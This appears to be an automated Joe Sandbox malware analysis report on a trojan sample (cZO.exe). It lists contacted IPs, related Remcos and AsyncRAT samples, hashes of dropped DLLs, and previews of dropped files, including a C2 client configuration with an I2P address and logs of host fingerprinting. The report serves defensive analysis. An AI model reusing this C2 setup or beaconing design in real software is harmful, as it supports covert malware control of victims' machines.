                                                                                                                  unknownUkraine
                                                                                                                  8654CRIMEAINFOCOM-ASUAfalse
                                                                                                                  77.238.244.54
                                                                                                                  unknownRussian Federation
                                                                                                                  42429TELERU-ASRUfalse
                                                                                                                  120.24.253.140
                                                                                                                  unknownChina
                                                                                                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  84.52.93.26
                                                                                                                  unknownRussian Federation
                                                                                                                  25408WESTCALL-SPB-ASRUfalse
                                                                                                                  24.125.49.216
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  2.155.132.51
                                                                                                                  unknownSpain
                                                                                                                  12430VODAFONE_ESESfalse
                                                                                                                  179.254.168.215
                                                                                                                  unknownBrazil
                                                                                                                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                                                                                                  45.200.148.158
                                                                                                                  unknownSeychelles
                                                                                                                  328608Africa-on-Cloud-ASZAfalse
                                                                                                                  92.39.210.213
                                                                                                                  unknownRussian Federation
                                                                                                                  39001MTSRUfalse
                                                                                                                  145.220.60.21
                                                                                                                  unknownNetherlands
                                                                                                                  1101IP-EEND-ASIP-EENDBVNLfalse
                                                                                                                  101.191.73.121
                                                                                                                  unknownAustralia
                                                                                                                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                                                                                  65.109.174.146
                                                                                                                  unknownUnited States
                                                                                                                  11022ALABANZA-BALTUSfalse
                                                                                                                  49.176.22.233
                                                                                                                  unknownAustralia
                                                                                                                  4804MPX-ASMicroplexPTYLTDAUfalse
                                                                                                                  50.37.113.212
                                                                                                                  unknownUnited States
                                                                                                                  27017ZIPLY-FIBER-LEGACY-ASNUSfalse
                                                                                                                  57.128.196.4
                                                                                                                  unknownBelgium
                                                                                                                  2686ATGS-MMD-ASUSfalse
                                                                                                                  95.158.36.98
                                                                                                                  unknownUkraine
                                                                                                                  35362BESTBestISPUAtrue
                                                                                                                  31.10.150.55
                                                                                                                  unknownSwitzerland
                                                                                                                  6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                                                                                  73.110.171.77
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  95.105.66.5
                                                                                                                  unknownRussian Federation
                                                                                                                  57128KGS-NETRUfalse
                                                                                                                  72.11.42.34
                                                                                                                  unknownUnited States
                                                                                                                  22709NSTELCOUSfalse
                                                                                                                  82.65.181.52
                                                                                                                  unknownFrance
                                                                                                                  12322PROXADFRfalse
                                                                                                                  71.246.18.247
                                                                                                                  unknownUnited States
                                                                                                                  701UUNETUSfalse
                                                                                                                  78.58.40.197
                                                                                                                  unknownLithuania
                                                                                                                  8764TELIA-LIETUVALTfalse
                                                                                                                  176.241.49.148
                                                                                                                  unknownHungary
                                                                                                                  20845DIGICABLEHUfalse
                                                                                                                  45.83.104.162
                                                                                                                  unknownGermany
                                                                                                                  197540NETCUP-ASnetcupGmbHDEfalse
                                                                                                                  67.2.9.136
                                                                                                                  unknownUnited States
                                                                                                                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                                                  208.113.128.162
                                                                                                                  unknownUnited States
                                                                                                                  26347DREAMHOST-ASUSfalse
                                                                                                                  128.140.43.40
                                                                                                                  unknownGermany
                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                  108.61.189.74
                                                                                                                  unknownUnited States
                                                                                                                  20473AS-CHOOPAUSfalse
                                                                                                                  193.233.193.76
                                                                                                                  unknownRussian Federation
                                                                                                                  2895FREE-NET-ASFREEnetEUfalse
                                                                                                                  198.74.48.115
                                                                                                                  unknownUnited States
                                                                                                                  63949LINODE-APLinodeLLCUSfalse
                                                                                                                  120.77.100.135
                                                                                                                  unknownChina
                                                                                                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  174.164.200.204
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  68.183.196.133
                                                                                                                  reseed.i2pgit.orgUnited States
                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                  46.142.175.43
                                                                                                                  unknownGermany
                                                                                                                  8881VERSATELDEfalse
                                                                                                                  69.10.220.235
                                                                                                                  unknownUnited States
                                                                                                                  20394MASHELL-TELECOMUStrue
                                                                                                                  213.108.251.66
                                                                                                                  unknownRussian Federation
                                                                                                                  49834BESTHOSTINGRUfalse
                                                                                                                  178.175.134.3
                                                                                                                  unknownMoldova Republic of
                                                                                                                  43289TRABIAMDfalse
                                                                                                                  185.226.181.238
                                                                                                                  reseed-pl.i2pd.xyzSpain
                                                                                                                  197518RACKMARKTEStrue
                                                                                                                  IP
                                                                                                                  127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584500
Start date and time: 2025-01-05 17:48:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cZO.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@46/72@4/59
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 52.165.164.15, 40.126.32.74, 20.190.160.17, 40.126.32.133, 40.126.32.136, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.76, 20.189.173.21, 13.107.246.45
                                                                                                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                  • Execution Graph export aborted for target cZO.exe, PID 7128 because there are no executed function
                                                                                                                  • Execution Graph export aborted for target shdpeqdz2a54sj46ur0.exe, PID 7088 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
11:48:57  API Interceptor  155x Sleep call for process: cZO.exe modified
11:48:59  API Interceptor  39x Sleep call for process: powershell.exe modified
11:50:15  API Interceptor  5149x Sleep call for process: main.exe modified
11:50:48  API Interceptor  1x Sleep call for process: WerFault.exe modified
Match           Associated Sample Name / URL       Detection  Threat Name
23.137.249.66   file.exe                           malicious  Unknown
95.216.2.172    file.exe                           malicious  Unknown
194.54.156.174  DF2.exe                            malicious  Unknown
31.3.152.100    ZJYhnDLhwa.exe                     malicious  Remcos
                ZfigYV6HXd.exe                     malicious  Remcos
                g4E1F7Lc2O.exe                     malicious  Remcos
                yVhvGnsUpL.exe                     malicious  Remcos
                BoFA_Remittance Advice_21219.xlsm  malicious  Remcos DBatLoader
                IQl00lxPjo.exe                     malicious  Remcos
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reseed.i2pgit.org | DF2.exe | Get hash | malicious | Unknown | Browse | 68.183.196.133
reseed.memcpy.io | file.exe | Get hash | malicious | Unknown | Browse | 95.216.2.172
bg.microsoft.map.fastly.net | jaTDEkWCbs.exe | Get hash | malicious | Quasar | Browse | 199.232.210.172
 | 3LcZO15oTC.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | N5kEzgUBn6.exe | Get hash | malicious | CobaltStrike, Metasploit | Browse | 199.232.214.172
 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | Get hash | malicious | Remcos | Browse | 199.232.214.172
 | N5kEzgUBn6.exe | Get hash | malicious | CobaltStrike, Metasploit | Browse | 199.232.210.172
 | setup64v9.3.4.msi | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | KpHYfxnJs6.exe | Get hash | malicious | Blank Grabber | Browse | 199.232.210.172
 | c2.hta | Get hash | malicious | Remcos | Browse | 199.232.214.172
 | phishingtest.eml | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | a36r7SLgH7.exe | Get hash | malicious | AsyncRAT | Browse | 199.232.214.172
                                                                                                                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | DF2.exe | Get hash | malicious | Unknown | Browse |
 | ET5.exe | Get hash | malicious | Unknown | Browse |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | DF2.exe | Get hash | malicious | Unknown | Browse |
 | ET5.exe | Get hash | malicious | Unknown | Browse |
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll | DF2.exe | Get hash | malicious | Unknown | Browse |
 | ET5.exe | Get hash | malicious | Unknown | Browse |
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):65536
                                                                                                                                                Entropy (8bit):0.9807208625347982
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:Ld3m6Q/d0MALS36j1TEzuiFcJZ24lO8l:Bm1/eMALXj1ozuiFcJY4lO8l
                                                                                                                                                MD5:A4230802BDFCD187DBD5A5AC81982196
                                                                                                                                                SHA1:F1CD46D4048EF13D913F69465BAFC8A7C4CA1A17
                                                                                                                                                SHA-256:8B4FCA86B22A6D8F60EEB574A632F12AB215966FE1FF3FA27E6C9B317BA07DD0
                                                                                                                                                SHA-512:54C861C11691B8643186D1D00BED7764733119C7D546CF82026AE3AFAB4FE4D4BF4FC83E964A9B3B688C29F0F84A74D71F0524562FD3169508E17423FDD98458
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.6.9.4.3.4.5.3.2.6.2.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.6.9.4.3.5.7.0.4.4.8.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.d.9.8.c.1.-.f.a.7.d.-.4.9.7.f.-.b.5.e.f.-.7.1.a.5.0.9.a.c.d.2.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.5.3.e.9.f.9.-.0.8.a.b.-.4.d.4.3.-.b.4.c.5.-.f.e.f.e.d.9.3.e.5.9.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.c.-.0.0.0.0.-.0.0.1.4.-.e.5.c.2.-.b.0.c.e.9.1.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sun Jan 5 16:50:34 2025, 0x1205a4 type
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):636854
                                                                                                                                                Entropy (8bit):1.0036505838068654
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:qSC5cq+GwguFtH+Exz2j9nZJo9FPMWp//Na2hQOFLI0:efE/BQO
                                                                                                                                                MD5:A1A600A99E372941548F05089B61875C
                                                                                                                                                SHA1:BD55A72E3B5CBEE973A54FE41F58D78D1F24FF47
                                                                                                                                                SHA-256:CAC0839E32428A22C3AA4D1FA5F2DB1655CCF2A8FFDD1E55D6929AF3134B4D67
                                                                                                                                                SHA-512:14C49C15A5E2DE417D125305C1696ACAC25E3207EDD2D0AB612DFFDBE6516CE8D368BDC33D906F6EDBE09F90457B80BE4A4A4419EBA3142FC9C95CD3A346D85A
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6734
                                                                                                                                                Entropy (8bit):3.718402035734142
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:RSIU6o7wVetb/Tv8nDYHV447Z5aM4UB89bfm1DbUfc+Vm:R6l7wVeJ/Tv4YHxprB89bfq8fzVm
                                                                                                                                                MD5:CAF8C97EA4C67DEA614F449C39881061
                                                                                                                                                SHA1:8D9CF301497C6F4E4A98F2F70D994ACCFCD4E4E1
                                                                                                                                                SHA-256:5AC3C6DE5F457FACFF6D5074B4C838C3F267DE2C24F331352FFB8CE3E2F6FF70
                                                                                                                                                SHA-512:02FC9488AE29A9FD1367FEBA8717EBE6EEC8FFDACEE191CF76C6B53B45B5A8F67BF2501DA078440107366930CA9A86B96F3CA7DF5ED719516A65E55F6BA5BD22
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.4.<./.P.i.
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4603
                                                                                                                                                Entropy (8bit):4.415755310291748
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662873" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75382
                                                                                                                                                Entropy (8bit):3.047293772628709
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13340
                                                                                                                                                Entropy (8bit):2.6857470957661005
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
Preview:B TimerResolution 156250..B PageSize 4096..B NumberOfPhysicalPages 1048333..B LowestPhysicalPageNumber 2..B HighestPhysicalPageNumber 1310719..B AllocationGranularity 65536..B MinimumUserModeAddress 65536..B MaximumUserModeAddress 140737488289791..B ActiveProcessorsAffinityMask
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.193969228624904
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2128
                                                                                                                                                Entropy (8bit):5.404753982480259
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):213
                                                                                                                                                Entropy (8bit):5.129024990254676
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):104448
                                                                                                                                                Entropy (8bit):6.236071662185895
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1021
                                                                                                                                                Entropy (8bit):5.462313039314351
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8bfb51dbd)..[I] (tcp_connect) -> Done(sock=0x384,host=7
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92672
                                                                                                                                                Entropy (8bit):6.229119632298774
                                                                                                                                                Encrypted:false
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):44463
                                                                                                                                                Entropy (8bit):5.261321148614135
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ALNOTXTbX3EnIcE39EvhEkuE0kaUNB4eMzP2TApumnYh:kNOTPn5yzDOzPEAMsYh
                                                                                                                                                MD5:43C3CDA4576560A6D28E6A9B3FF959C3
                                                                                                                                                SHA1:67E8111ABBF29287B586CD15ABF8856182AC7103
                                                                                                                                                SHA-256:F8AB3EDE9EC4291E134218622DA2F3665A214B212058A48DBFD081B8B55EA0D7
                                                                                                                                                SHA-512:DED652AC77EBD0018DC27C4B1EA3CC061BB33FFDB55434A6D094C9AC33A517919B9D33E7C3F9A65CDFE45F7847AFA2D5716C1BB0E8BD2B7C53142CBFB10EEFC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8568
                                                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75977
                                                                                                                                                Entropy (8bit):7.8696816318811385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                                                                                                MD5:E53A179BB45CD7EDD8371740D65076BD
